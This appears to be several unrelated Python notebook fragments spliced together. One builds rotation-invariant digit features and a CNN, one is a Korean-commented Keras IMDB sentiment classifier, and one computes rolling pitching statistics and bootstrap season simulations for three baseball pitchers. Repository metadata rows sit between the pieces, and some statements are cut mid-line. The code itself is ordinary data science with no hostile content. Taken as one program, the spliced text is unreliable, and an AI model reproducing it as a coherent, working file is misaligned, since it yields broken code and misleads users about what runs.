# x_test_secorder = x_test_features[:,0:611]
# model_secorder = keras.Sequential([
# keras.layers.Dense(200, input_shape = (611,), activation=tf.nn.relu),
# keras.layers.Dense(10, activation=tf.nn.softmax)
# ])
# model_secorder.compile(optimizer='adam',
# loss='sparse_categorical_crossentropy',
# metrics=['accuracy'])
# model_secorder.fit(x_train_secorder, y_train, epochs=30)
# +
# model_secorder.evaluate(x_test_secorder, y_test)
# +
#Now want to show features are invariant under rotation (technically by 2pi/32)
#Creating the rotation matrix
PermBlock = np.empty((32,32))
for i in range(32):
for j in range(32):
if (i+1)%32 == j:
PermBlock[i,j] = 1
else:
PermBlock[i,j] = 0
PermMat1 = np.kron(np.eye(13),PermBlock)
PermMat2 = np.vstack((np.zeros((1,13*32)),PermMat1))
PermMat_FirstCol = np.zeros((13*32+1,1))
PermMat_FirstCol[0] = 1
PermMat = np.hstack((PermMat_FirstCol,PermMat2))
print(PermMat.shape)
PermMat
# -
#Show that features are invariant under rotation by 2*pi/32. Will do it on test set, since calculating features is long.
#As this generates group, features invariant under entire action
test_rotdiff = np.array([rot_features(x) for x in np.transpose(np.matmul(PermMat,np.transpose(x_test_rot)))])
np.amax(np.abs(x_test_features-test_rotdiff))
# +
#Confirm for an even more extreme rotation of 13*2*pi/32.
x_test_rot100 = np.transpose(np.matmul(np.linalg.matrix_power(PermMat,13),np.transpose(x_test_rot[:100])))
test_rotdiff100 = np.array([rot_features(x) for x in x_test_rot100])
np.amax(np.abs(x_test_features[:100]-test_rotdiff100))
# +
#Now want to train a CNN:
#First, prepare the data for CNN
x_test_CNN = x_test.reshape(10000,28,28,1)
x_train_CNN = x_train.reshape(50000,28,28,1)
x_hold_CNN = x_hold.reshape(10000,28,28,1)
x_test_CNN = x_test_CNN.astype('float32')
x_train_CNN = x_train_CNN.astype('float32')
x_test_CNN = x_test_CNN/255
x_train_CNN = x_train_CNN/255
x_hold_CNN = x_hold_CNN/255
# -
x_train_CNN.shape
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.optimizers import Adam
from keras.layers.normalization import BatchNormalization
from keras.utils import np_utils
from keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D, GlobalAveragePooling2D
from keras.layers.advanced_activations import LeakyReLU
# +
# Three steps to create a CNN
# 1. Convolution
# 2. Activation
# 3. Pooling
# Repeat Steps 1,2,3 for adding more hidden layers
# 4. After that make a fully connected network
# This fully connected network gives ability to the CNN
# to classify the samples
model_CNN = Sequential()
model_CNN.add(Conv2D(32, (3, 3), input_shape=(28,28,1)))
model_CNN.add(BatchNormalization(axis=-1))
model_CNN.add(Activation('relu'))
model_CNN.add(Conv2D(32, (3, 3)))
model_CNN.add(BatchNormalization(axis=-1))
model_CNN.add(Activation('relu'))
model_CNN.add(MaxPooling2D(pool_size=(2,2)))
model_CNN.add(Conv2D(64,(3, 3)))
model_CNN.add(BatchNormalization(axis=-1))
model_CNN.add(Activation('relu'))
model_CNN.add(Conv2D(64, (3, 3)))
model_CNN.add(BatchNormalization(axis=-1))
model_CNN.add(Activation('relu'))
model_CNN.add(MaxPooling2D(pool_size=(2,2)))
model_CNN.add(Flatten())
# Fully connected layer
model_CNN.add(Dense(512))
model_CNN.add(BatchNormalization())
model_CNN.add(Activation('relu'))
model_CNN.add(Dropout(0.2))
model_CNN.add(Dense(10))
model_CNN.add(Activation('softmax'))
model_CNN.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# -
model_CNN.fit(x_train_CNN, y_train, epochs=5)
model_CNN.evaluate(x_test_CNN, y_test)
# +
#Now, we'll evaluate all models so far on rotated test set
#Generate rotated dataset first:
x_hold_rotCNN = []
for i in range(10000):
x_hold_rotCNN.append((tf.contrib.keras.preprocessing.image.random_rotation(x_hold_CNN[i], rg = 90, row_axis=0, col_axis=1, channel_axis=2)))
x_hold_rotCNN = np.array(x_hold_rotCNN)
# -
import cv2
x_test.shape
M = cv2.getRotationMatrix2D((28 / 2, 28 / 2), 67, 1)
res = cv2.warpAffine(x_hold[100], M, (28, 28))
res = np.matmul(GF,res.reshape(784))
res = res/np.amax(res)
rot_plot(res)
#Generate features
x_hold_rot_raw = x_hold_rotCNN.reshape(10000,28,28)
x_hold_rot_raw = np.array([x.reshape((784))for x in x_hold_rot_raw])
x_hold_rot_raw = np.transpose(np.matmul(GF, np.transpose(x_hold_rot_raw)))
x_hold_rot_raw = np.transpose(np.transpose(x_hold_rot_raw)/np.amax(x_hold_rot_raw,axis=1))
x_hold_rot_features = np.array([rot_features(x) for x in x_hold_rot_raw])
x_hold_rotCNN.shape
def diffrot(i):
return(np.amax(rot_features(x_test_rotated_raw[i])-rot_features(x_test_rot[i])))
diffrot(400)
print(y_hold[100])
rot_plot(x_hold_rot_raw[100])
print("Number is ",y_test[100])
rot_plot(np.matmul(np.linalg.matrix_power(PermMat,13),x_hold_rot_raw[100]))
print("Number is ",y_test[100])
rot_plot(x_hold_rotTest[100])
x_hold_rotTest = np.array([x.reshape((784))for x in x_hold])
x_hold_rotTest = np.transpose(np.matmul(GF, np.transpose(x_hold_rotTest)))
x_hold_rotTest = np.transpose(np.transpose(x_hold_rotTest)/np.amax(x_hold_rotTest,axis=1))
# +
#So rotated and original image give the same
print(np.amax(rot_features(np.matmul(np.linalg.matrix_power(PermMat,13),x_hold_rot_raw[100])) - rot_features(x_hold_rot_raw[100])))
#Now lets compare to original
print(np.amax(rot_features(x_hold_rot_raw[100])-rot_features(x_hold_rotTest[100])))
#Now compare cv rotated
print(np.amax(rot_features(x_hold_rot_raw[100])-rot_features(res)))
# -
model_tanh.evaluate(x_test_rotated_features,y_test)
print("InvarFeatures, Full: ",model.evaluate(x_hold_rot_features, y_hold))
#print("CNN: ",model_CNN.evaluate(x_hold_rotCNN, y_h
| 12,288 |
/케라스 이진분류 알아보기.ipynb
|
dade2e7b54701c501a5e235ca1a300f970d1acf0
|
[] |
no_license
|
zerosum99/keras
|
https://github.com/zerosum99/keras
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 65,865 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from keras.datasets import imdb
# ## 피클을 처리하려면 예외가 발생하므로
#
# - 넘파이 load 모듈을 변경해서 처리
import numpy as np
# +
# save np.load
np_load_old = np.load
# modify the default parameters of np.load
np.load = lambda *a,**k: np_load_old(*a, allow_pickle=True, **k)
# -
(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)
# restore np.load for future normal usage
np.load = np_load_old
# ## 부정은 0 긍정은 1
# ### 긍정과 부정을 50% 씩 데이터화
train_labels.sum()
(train_labels < 1).sum()
train_labels.shape
train_data.shape
max(train_data.max())
# ## 단어별로 변환하기
word_index = imdb.get_word_index()
# ### 학습 데이터 내부의 원소가 전부 리스트로 되어 있음
train_data.shape
train_data
train_data[0]
type(word_index)
reverse_word_index = dict([(value, key) for (key, value) in word_index.items()])
reverse_word_index[9995]
decoded_review = " ".join([reverse_word_index.get(i - 3, '?') for i in train_data[0]])
decoded_review
# ## 학습 및 데스트 데이터에 대한 다차원 배열로 변형
def vectorize_sequence(sequences, dimension= 10000) :
results = np.zeros((len(sequences), dimension))
for i, sequence in enumerate(sequences) :
results[i,sequence] = 1
return results
x_train = vectorize_sequence(train_data)
x_test = vectorize_sequence(test_data)
x_train[0]
x_train.shape
x_test.shape
y_train = np.asarray(train_labels).astype('float32')
y_test = np.asarray(test_labels).astype('float32')
# ## 모델 정의하기
from keras import models
from keras import layers
# ### 모델 객체 만들기
type(models.Sequential)
model = models.Sequential()
# ### 모델에 계층 추가하기
type(layers.Dense)
model.add(layers.Dense(16, activation='relu', input_shape=(10000,)))
model.add(layers.Dense(16, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
# ## 모델 컴파일 하기
model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])
# ## 검증 데이터 만들기
x_val = x_train[ : 10000]
partial_x_train = x_train[10000:]
y_val = y_train[:10000]
partial_y_train = y_train[10000:]
# ## 모델 훈련하기
history = model.fit(partial_x_train, partial_y_train, epochs=20, batch_size=512, validation_data=(x_val, y_val))
history.history.keys()
# ## 훈련과 검증 손실 그래프 그리기
# %matplotlib inline
import matplotlib.pyplot as plt
history_dict = history.history
loss = history_dict['loss']
val_loss = history_dict['val_loss']
epochs = range(1, len(loss)+1)
# +
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label="Validation loss")
plt.title(' Training and Validataion loss')
plt.xlabel('epochs')
plt.ylabel(' Loss')
plt.legend()
# -
acc = history_dict['acc']
val_acc = history_dict['val_acc']
# +
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label="Validation acc")
plt.title(' Training and Validataion acc')
plt.xlabel('epochs')
plt.ylabel(' Accuracy')
plt.legend()
# -
# ## 다시 훈련하기
model.fit(x_train,y_train, epochs=4, batch_size=512)
results = model.evaluate(x_test, y_test)
results
# ## 예측하기
model.predict(x_test)
['rollingIP']
# opponents against
arrieta['1B'] = arrieta.H - (arrieta['2B'] + arrieta['3B'] + arrieta['HR'])
arrieta['AVG'] = arrieta.H.cumsum() / arrieta.AB.cumsum()
arrieta['OBP'] = (arrieta.H.cumsum() + arrieta.BB.cumsum() + arrieta.HBP.cumsum()) \
/ (arrieta.AB.cumsum() + arrieta.BB.cumsum() + arrieta.HBP.cumsum() + arrieta.SF.cumsum())
arrieta['SLG'] = (arrieta['1B'].cumsum() + (arrieta['2B'].cumsum() * 2) + \
(arrieta['3B'].cumsum() * 3) + (arrieta['HR'].cumsum() * 4)) \
/ arrieta.AB.cumsum()
arrieta['OPS'] = arrieta.OBP + arrieta.SLG
# rates
arrieta['BABIP'] = (arrieta.H.cumsum() - arrieta.HR.cumsum()) \
/ (arrieta.AB.cumsum() - arrieta.SO.cumsum() - arrieta.HR.cumsum() + arrieta.SF.cumsum())
arrieta['HR%'] = arrieta.HR.cumsum() / arrieta.BF.cumsum()
arrieta['XBH%'] = (arrieta['2B'].cumsum() + arrieta['3B'].cumsum() + arrieta['HR'].cumsum()) / arrieta.BF.cumsum()
arrieta['K%'] = arrieta['SO'].cumsum() / arrieta.BF.cumsum()
arrieta['IP%'] = (arrieta.AB.cumsum() - arrieta.SO.cumsum() - arrieta.HR.cumsum() + arrieta.SF.cumsum()) \
/ arrieta.BF.cumsum()
arrieta['GB%'] = arrieta['GB'].cumsum() \
/ (arrieta.AB.cumsum() - arrieta.SO.cumsum() - arrieta.HR.cumsum() + arrieta.SF.cumsum())
## greinke
greinke['rollingIP'] = greinke.IP.cumsum()
greinke['IPGame'] = greinke.rollingIP / greinke.Rk
greinke['rollingER'] = greinke.ER.cumsum()
greinke['rollingERA'] = greinke['rollingER'] / (greinke['rollingIP'] / 9.)
greinke['strikeoutsPerIP'] = greinke.SO.cumsum() / greinke['rollingIP']
greinke['K/9'] = greinke.SO.cumsum() / (greinke['rollingIP'] / 9.)
greinke['strikeoutsPerBF'] = greinke.SO.cumsum() / greinke.BF.cumsum()
greinke['hitsPerIP'] = greinke.H.cumsum() / greinke['rollingIP']
greinke['hitsPerAB'] = greinke.H.cumsum() / greinke.AB.cumsum()
greinke['rollingWHIP'] = (greinke.H.cumsum() + greinke.BB.cumsum()) / greinke['rollingIP']
greinke['1B'] = greinke.H - (greinke['2B'] + greinke['3B'] + greinke['HR'])
greinke['AVG'] = greinke.H.cumsum() / greinke.AB.cumsum()
greinke['OBP'] = (greinke.H.cumsum() + greinke.BB.cumsum() + greinke.HBP.cumsum()) \
/ (greinke.AB.cumsum() + greinke.BB.cumsum() + greinke.HBP.cumsum() + greinke.SF.cumsum())
greinke['SLG'] = (greinke['1B'].cumsum() + (greinke['2B'].cumsum() * 2) + \
(greinke['3B'].cumsum() * 3) + (greinke['HR'].cumsum() * 4)) \
/ greinke.AB.cumsum()
greinke['OPS'] = greinke.OBP + greinke.SLG
greinke['BABIP'] = (greinke.H.cumsum() - greinke.HR.cumsum()) \
/ (greinke.AB.cumsum() - greinke.SO.cumsum() - greinke.HR.cumsum() + greinke.SF.cumsum())
greinke['HR%'] = greinke.HR.cumsum() / greinke.BF.cumsum()
greinke['XBH%'] = (greinke['2B'].cumsum() + greinke['3B'].cumsum() + greinke['HR'].cumsum()) / greinke.BF.cumsum()
greinke['K%'] = greinke['SO'].cumsum() / greinke.BF.cumsum()
greinke['IP%'] = (greinke.AB.cumsum() - greinke.SO.cumsum() - greinke.HR.cumsum() + greinke.SF.cumsum()) \
/ greinke.BF.cumsum()
greinke['GB%'] = greinke['GB'].cumsum() \
/ (greinke.AB.cumsum() - greinke.SO.cumsum() - greinke.HR.cumsum() + greinke.SF.cumsum())
## kershaw
kershaw['rollingIP'] = kershaw.IP.cumsum()
kershaw['IPGame'] = kershaw.rollingIP / kershaw.Rk
kershaw['rollingER'] = kershaw.ER.cumsum()
kershaw['rollingERA'] = kershaw['rollingER'] / (kershaw['rollingIP'] / 9.)
kershaw['strikeoutsPerIP'] = kershaw.SO.cumsum() / kershaw['rollingIP']
kershaw['K/9'] = kershaw.SO.cumsum() / (kershaw['rollingIP'] / 9.)
kershaw['strikeoutsPerBF'] = kershaw.SO.cumsum() / kershaw.BF.cumsum()
kershaw['hitsPerIP'] = kershaw.H.cumsum() / kershaw['rollingIP']
kershaw['hitsPerAB'] = kershaw.H.cumsum() / kershaw.AB.cumsum()
kershaw['rollingWHIP'] = (kershaw.H.cumsum() + kershaw.BB.cumsum()) / kershaw['rollingIP']
kershaw['1B'] = kershaw.H - (kershaw['2B'] + kershaw['3B'] + kershaw['HR'])
kershaw['AVG'] = kershaw.H.cumsum() / kershaw.AB.cumsum()
kershaw['OBP'] = (kershaw.H.cumsum() + kershaw.BB.cumsum() + kershaw.HBP.cumsum()) \
/ (kershaw.AB.cumsum() + kershaw.BB.cumsum() + kershaw.HBP.cumsum() + kershaw.SF.cumsum())
kershaw['SLG'] = (kershaw['1B'].cumsum() + (kershaw['2B'].cumsum() * 2) + \
(kershaw['3B'].cumsum() * 3) + (kershaw['HR'].cumsum() * 4)) \
/ kershaw.AB.cumsum()
kershaw['OPS'] = kershaw.OBP + kershaw.SLG
kershaw['BABIP'] = (kershaw.H.cumsum() - kershaw.HR.cumsum()) \
/ (kershaw.AB.cumsum() - kershaw.SO.cumsum() - kershaw.HR.cumsum() + kershaw.SF.cumsum())
kershaw['HR%'] = kershaw.HR.cumsum() / kershaw.BF.cumsum()
kershaw['XBH%'] = (kershaw['2B'].cumsum() + kershaw['3B'].cumsum() + kershaw['HR'].cumsum()) / kershaw.BF.cumsum()
kershaw['K%'] = kershaw['SO'].cumsum() / kershaw.BF.cumsum()
kershaw['IP%'] = (kershaw.AB.cumsum() - kershaw.SO.cumsum() - kershaw.HR.cumsum() + kershaw.SF.cumsum()) \
/ kershaw.BF.cumsum()
kershaw['GB%'] = kershaw['GB'].cumsum() \
/ (kershaw.AB.cumsum() - kershaw.SO.cumsum() - kershaw.HR.cumsum() + kershaw.SF.cumsum())
# -
ax = arrieta['GB%'].plot(label='Arrieta')
greinke['GB%'].plot(ax=ax, label='Greinke')
kershaw['GB%'].plot(ax=ax, label='Kershaw')
plt.legend(loc='best')
# ### Arrieta's Second Half
# +
arrieta2H = arrieta.ix[allstarbreak:].copy()
arrieta2H['rollingIP'] = arrieta2H.IP.cumsum()
arrieta2H['IPGame'] = arrieta2H.rollingIP / arrieta2H.Rk
arrieta2H['rollingER'] = arrieta2H.ER.cumsum()
arrieta2H['rollingERA'] = arrieta2H['rollingER'] / (arrieta2H['rollingIP'] / 9.)
arrieta2H['strikeoutsPerIP'] = arrieta2H.SO.cumsum() / arrieta2H['rollingIP']
arrieta2H['K/9'] = arrieta2H.SO.cumsum() / (arrieta2H['rollingIP'] / 9.)
arrieta2H['strikeoutsPerBF'] = arrieta2H.SO.cumsum() / arrieta2H.BF.cumsum()
arrieta2H['hitsPerIP'] = arrieta2H.H.cumsum() / arrieta2H['rollingIP']
arrieta2H['hitsPerAB'] = arrieta2H.H.cumsum() / arrieta2H.AB.cumsum()
arrieta2H['rollingWHIP'] = (arrieta2H.H.cumsum() + arrieta2H.BB.cumsum()) / arrieta2H['rollingIP']
# opponents against
arrieta2H['1B'] = arrieta2H.H - (arrieta2H['2B'] + arrieta2H['3B'] + arrieta2H['HR'])
arrieta2H['AVG'] = arrieta2H.H.cumsum() / arrieta2H.AB.cumsum()
arrieta2H['OBP'] = (arrieta2H.H.cumsum() + arrieta2H.BB.cumsum() + arrieta2H.HBP.cumsum()) \
/ (arrieta2H.AB.cumsum() + arrieta2H.BB.cumsum() + arrieta2H.HBP.cumsum() + arrieta2H.SF.cumsum())
arrieta2H['SLG'] = (arrieta2H['1B'].cumsum() + (arrieta2H['2B'].cumsum() * 2) + \
(arrieta2H['3B'].cumsum() * 3) + (arrieta2H['HR'].cumsum() * 4)) \
/ arrieta2H.AB.cumsum()
arrieta2H['OPS'] = arrieta2H.OBP + arrieta2H.SLG
# rates
arrieta2H['BABIP'] = (arrieta2H.H.cumsum() - arrieta2H.HR.cumsum()) \
/ (arrieta2H.AB.cumsum() - arrieta2H.SO.cumsum() - arrieta2H.HR.cumsum() + arrieta2H.SF.cumsum())
arrieta2H['HR%'] = arrieta2H.HR.cumsum() / arrieta2H.BF.cumsum()
arrieta2H['XBH%'] = (arrieta2H['2B'].cumsum() + arrieta2H['3B'].cumsum() + arrieta2H['HR'].cumsum()) / arrieta2H.BF.cumsum()
arrieta2H['K%'] = arrieta2H['SO'].cumsum() / arrieta2H.BF.cumsum()
arrieta2H['IP%'] = (arrieta2H.AB.cumsum() - arrieta2H.SO.cumsum() - arrieta2H.HR.cumsum() + arrieta2H.SF.cumsum()) \
/ arrieta2H.BF.cumsum()
# -
# ### Grid O' Stats
# +
PITCHERS = {'Arrieta': {'df': arrieta, 'color': ja, 'style': '-'},
'Greinke': {'df': greinke, 'color': zg, 'style': '-'},
'Kershaw': {'df': kershaw, 'color': kc, 'style': '--'}}
PITCHERS = OrderedDict(sorted(PITCHERS.items()))
stats = ['rollingERA', 'K/9', 'AVG', 'OBP', 'SLG', 'OPS']
row_titles = ['{}'.format(row_title) for row_title in PITCHERS.keys()]
col_titles = ['{}'.format(col_title.replace('rolling', '')) for col_title in stats]
fig, axes = plt.subplots(figsize=(16,6), nrows=len(PITCHERS), ncols=len(stats), sharex=True)
fig.tight_layout(pad=1.2, h_pad=1.5)
# label each column with stat name
for ax, col_title in zip(axes[0], col_titles):
ax.set_title(col_title, size=15)
# label each row with player name
for ax, row_title in zip(axes[:,0], row_titles):
ax.set_ylabel(row_title, rotation=0, size=15, labelpad=40)
for i, (name, pitcher) in enumerate(PITCHERS.items()):
for j, stat in enumerate(stats):
title = '{}: {}'.format(name, stat.replace('rolling', '')) # remove "rolling" from "rollingERA"
pitcher['df'][stat].plot(ax=axes[i,j], color=pitcher['color'], linestyle=pitcher['style'])
# for ease of comparison, let's plot the other pitchers on the same chart
# but let's make them a light grey with the appropriate linestyle
for k, v in PITCHERS.items():
if k != name:
v['df'][stat].plot(ax=axes[i,j], color='grey', alpha=0.4, linestyle=v['style'])
axes[i,j].tick_params(axis='both', which='major', labelsize=13)
axes[i,j].axvline(allstarbreak, color='k', linestyle=':', linewidth=1)
axes[i,j].yaxis.set_major_locator(MaxNLocator(nbins=4))
axes[i,0].set_ylim(0, 6) # ERA
axes[i,1].set_ylim(0, 15.) # K/9
axes[i,2].set_ylim(0, .350) # AVG
axes[i,3].set_ylim(0, .4) # OBP
axes[i,4].set_ylim(0, .5) # SLG
axes[i,5].set_ylim(0, .9) # OPS
# axes[i,j].spines['top'].set_visible(False)
# axes[i,j].spines['right'].set_visible(False)
plt.savefig('images/stats-comparison.png', bbox_inches='tight', dpi=120)
# +
stats = ['IP%', 'BABIP', 'XBH%', 'HR%', 'K%']
row_titles = ['{}'.format(row_title) for row_title in PITCHERS.keys()]
col_titles = ['{}'.format(col_title) for col_title in stats]
fig, axes = plt.subplots(figsize=(15,6), nrows=len(PITCHERS), ncols=len(stats), sharex=True)
fig.tight_layout(pad=1.2, h_pad=1.5)
# label each column with stat name
for ax, col_title in zip(axes[0], col_titles):
ax.set_title(col_title, size=15)
# label each row with player name
for ax, row_title in zip(axes[:,0], row_titles):
ax.set_ylabel(row_title, rotation=0, size=15, labelpad=40)
for i, (name, pitcher) in enumerate(PITCHERS.items()):
for j, stat in enumerate(stats):
title = '{}: {}'.format(name, stat) # remove "rolling" from "rollingERA"
pitcher['df'][stat].plot(ax=axes[i,j], color=pitcher['color'], linestyle=pitcher['style'])
# for ease of comparison, let's plot the other pitchers on the same chart
# but let's make them a light grey with the appropriate linestyle
for k, v in PITCHERS.items():
if k != name:
v['df'][stat].plot(ax=axes[i,j], color='grey', alpha=0.4, linestyle=v['style'])
axes[i,j].tick_params(axis='both', which='major', labelsize=13)
axes[i,j].axvline(allstarbreak, color='k', linestyle=':', linewidth=1)
axes[i,j].yaxis.set_major_locator(MaxNLocator(nbins=4))
axes[i,0].set_ylim(0, 1.) # IP%
axes[i,1].set_ylim(0, .500) # BABIP
axes[i,2].set_ylim(0, .16) # XBH%
axes[i,3].set_ylim(0, .04) # HR%
axes[i,4].set_ylim(0, .36) # K%
# axes[i,j].spines['top'].set_visible(False)
# axes[i,j].spines['right'].set_visible(False)
plt.savefig('images/rates-comparison.png', bbox_inches='tight', dpi=120)
# -
# ## Season Simulation
# ### What if we replayed the season (sampling randomly from their performances)? Can we tell who is truly the ERA winner?
# +
# use the bootstrap to pick a "season" with replacement.
# do this 1000 times. compare the distributions of important stats
np.random.seed(49)
arrietaSeasons = []
greinkeSeasons = []
kershawSeasons = []
for i in range(1000):
arrietaGameIds = np.random.choice(arrieta.index, size=len(arrieta.index), replace=True)
arrietaSeasons.append(arrieta.ix[arrietaGameIds]) # one DataFrame = one "season"
greinkeGameIds = np.random.choice(greinke.index, size=len(greinke.index), replace=True)
greinkeSeasons.append(greinke.ix[greinkeGameIds])
kershawGameIds = np.random.choice(kershaw.index, size=len(kershaw.index), replace=True)
kershawSeasons.append(kershaw.ix[kershawGameIds])
# there's a much, much better way to structure this code ... but I was thinking of more things as I was writing it
# so it just kept expanding. oh well. it's readable.
sims = {'arrieta': defaultdict(list),
'greinke': defaultdict(list),
'kershaw': defaultdict(list)}
for i in range(1000):
# ERA
sims['arrieta']['ERA'].append(arrietaSeasons[i].ER.sum() / (arrietaSeasons[i].IP.sum() / 9.))
sims['greinke']['ERA'].append(greinkeSeasons[i].ER.sum() / (greinkeSeasons[i].IP.sum() / 9.))
sims['kershaw']['ERA'].append(kershawSeasons[i].ER.sum() / (kershawSeasons[i].IP.sum() / 9.))
# strikeouts
sims['arrieta']['SO'].append(arrietaSeasons[i].SO.sum())
sims['greinke']['SO'].append(greinkeSeasons[i].SO.sum())
sims['kershaw']['SO'].append(kershawSeasons[i].SO.sum())
# hits
sims['arrieta']['H'].append(arrietaSeasons[i].H.sum())
sims['greinke']['H'].append(greinkeSeasons[i].H.sum())
sims['kershaw']['H'].append(kershawSeasons[i].H.sum())
# doubles
sims['arrieta']['2B'].append(arrietaSeasons[i]['2B'].sum())
sims['greinke']['2B'].append(greinkeSeasons[i]['2B'].sum())
sims['kershaw']['2B'].append(kershawSeasons[i]['2B'].sum())
# doubles
sims['arrieta']['3B'].append(arrietaSeasons[i]['3B'].sum())
sims['greinke']['3B'].append(greinkeSeasons[i]['3B'].sum())
sims['kershaw']['3B'].append(kershawSeasons[i]['3B'].sum())
# home runs
sims['arrieta']['HR'].append(arrietaSeasons[i].HR.sum())
sims['greinke']['HR'].append(greinkeSeasons[i].HR.sum())
sims['kershaw']['HR'].append(kershawSeasons[i].HR.sum())
# walks
sims['arrieta']['BB'].append(arrietaSeasons[i].BB.sum())
sims['greinke']['BB'].append(greinkeSeasons[i].BB.sum())
sims['kershaw']['BB'].append(kershawSeasons[i].BB.sum())
# HBP
sims['arrieta']['HBP'].append(arrietaSeasons[i].HBP.sum())
sims['greinke']['HBP'].append(greinkeSeasons[i].HBP.sum())
sims['kershaw']['HBP'].append(kershawSeasons[i].HBP.sum())
# sacrifice flies
sims['arrieta']['SF'].append(arrietaSeasons[i].SF.sum())
sims['greinke']['SF'].append(greinkeSeasons[i].SF.sum())
sims['kershaw']['SF'].append(kershawSeasons[i].SF.sum())
# opponent batting average
sims['arrieta']['AVG'].append(arrietaSeasons[i].H.sum() / arrietaSeasons[i].AB.sum())
sims['greinke']['AVG'].append(greinkeSeasons[i].H.sum() / greinkeSeasons[i].AB.sum())
sims['kershaw']['AVG'].append(kershawSeasons[i].H.sum() / kershawSeasons[i].AB.sum())
# opponent OBP
arrietaOBP = (arrietaSeasons[i].H.sum() + arrietaSeasons[i].BB.sum() + arrietaSeasons[i].HBP.sum()) \
/ (arrietaSeasons[i].AB.sum() + arrietaSeasons[i].BB.sum() + \
arrietaSeasons[i].HBP.sum() + arrietaSeasons[i].SF.sum())
greinkeOBP = (greinkeSeasons[i].H.sum() + greinkeSeasons[i].BB.sum() + greinkeSeasons[i].HBP.sum()) \
/ (greinkeSeasons[i].AB.sum() + greinkeSeasons[i].BB.sum() + \
greinkeSeasons[i].HBP.sum() + greinkeSeasons[i].SF.sum())
kershawOBP = (kershawSeasons[i].H.sum() + kershawSeasons[i].BB.sum() + kershawSeasons[i].HBP.sum()) \
/ (kershawSeasons[i].AB.sum() + kershawSeasons[i].BB.sum() + \
kershawSeasons[i].HBP.sum() + kershawSeasons[i].SF.sum())
sims['arrieta']['OBP'].append(arrietaOBP)
sims['greinke']['OBP'].append(greinkeOBP)
sims['kershaw']['OBP'].append(kershawOBP)
# opponent slugging percentage
arrietaSLG = (arrietaSeasons[i].H.sum() + \
(arrietaSeasons[i]['2B'].sum() * 2) + \
(arrietaSeasons[i]['3B'].sum() * 3) + \
(arrietaSeasons[i]['HR'].sum() * 4)) / arrietaSeasons[i]['AB'].sum()
greinkeSLG = (greinkeSeasons[i].H.sum() + \
(greinkeSeasons[i]['2B'].sum() * 2) + \
(greinkeSeasons[i]['3B'].sum() * 3) + \
(greinkeSeasons[i]['HR'].sum() * 4)) / greinkeSeasons[i]['AB'].sum()
kershawSLG = (kershawSeasons[i].H.sum() + \
(kershawSeasons[i]['2B'].sum() * 2) + \
(kershawSeasons[i]['3B'].sum() * 3) + \
(kershawSeasons[i]['HR'].sum() * 4)) / kershawSeasons[i]['AB'].sum()
sims['arrieta']['SLG'].append(arrietaSLG)
sims['greinke']['SLG'].append(greinkeSLG)
sims['kershaw']['SLG'].append(kershawSLG)
# at bats
sims['arrieta']['AB'].append(arrietaSeasons[i].AB.sum())
sims['greinke']['AB'].append(greinkeSeasons[i].AB.sum())
sims['kershaw']['AB'].append(kershawSeasons[i].AB.sum())
# batters faced
sims['arrieta']['BF'].append(arrietaSeasons[i].BF.sum())
sims['greinke']['BF'].append(greinkeSeasons[i].BF.sum())
sims['kershaw']['BF'].append(kershawSeasons[i].BF.sum())
# pitches
sims['arrieta']['Pit'].append(arrietaSeasons[i].Pit.sum())
sims['greinke']['Pit'].append(greinkeSeasons[i].Pit.sum())
sims['kershaw']['Pit'].append(kershawSeasons[i].Pit.sum())
# strikes
sims['arrieta']['Str'].append(arrietaSeasons[i].Str.sum())
sims['greinke']['Str'].append(greinkeSeasons[i].Str.sum())
sims['kershaw']['Str'].append(kershawSeasons[i].Str.sum())
# strikes - looking
sims['arrieta']['StL'].append(arrietaSeasons[i].StL.sum())
sims['greinke']['StL'].append(greinkeSeasons[i].StL.sum())
sims['kershaw']['StL'].append(kershawSeasons[i].StL.sum())
# strikes - swinging
sims['arrieta']['StS'].append(arrietaSeasons[i].StS.sum())
sims['greinke']['StS'].append(greinkeSeasons[i].StS.sum())
sims['kershaw']['StS'].append(kershawSeasons[i].StS.sum())
# -
plt.title('ERA')
plt.hist(sims['arrieta']['ERA'], label='Arrieta', alpha=.4)
plt.hist(sims['greinke']['ERA'], label='Greinke', alpha=.4)
plt.hist(sims['kershaw']['ERA'], label='Kershaw', alpha=.4)
plt.xlabel('ERA')
plt.ylabel('# of simulations')
plt.legend(loc='best');
# +
# helper functions for proper rounding of stats
round_1 = lambda x: round(x, 1)
round_2 = lambda x: round(x, 2)
round_3 = lambda x: round(x, 3)
arrietaERA = list(map(round_2, sims['arrieta']['ERA']))
greinkeERA = list(map(round_2, sims['greinke']['ERA']))
kershawERA = list(map(round_2, sims['kershaw']['ERA']))
arrieta_cdf = pd.Series(dict(Counter(arrietaERA)))
greinke_cdf = pd.Series(dict(Counter(greinkeERA)))
kershaw_cdf = pd.Series(dict(Counter(kershawERA)))
# +
idx = np.arange(0, 3.51, .01)
# what percentage of the time do each combination wind up with the same ERA?
ERA = pd.concat([arrieta_cdf, greinke_cdf, kershaw_cdf], axis=1)
ERA.rename(columns={0: 'Arrieta', 1: 'Greinke', 2: 'Kershaw'}, inplace=True)
ERA = ERA.reindex(index=idx).fillna(0.)
ERA['Arrieta-Greinke'] = ERA[['Arrieta', 'Greinke']].min(axis=1)
ERA['Arrieta-Kershaw'] = ERA[['Arrieta', 'Kershaw']].min(axis=1)
ERA['Greinke-Kershaw'] = ERA[['Greinke', 'Kershaw']].min(axis=1)
ERA['Arrieta-Greinke-Kershaw'] = ERA[['Arrieta', 'Greinke', 'Kershaw']].min(axis=1)
# -
ERA[['Arrieta-Greinke-Kershaw']].sum()
ERA[['Arrieta-Greinke-Kershaw']].plot(kind='area')
# +
metrics = ['ERA', 'SO', 'AVG', 'OBP', 'SLG']
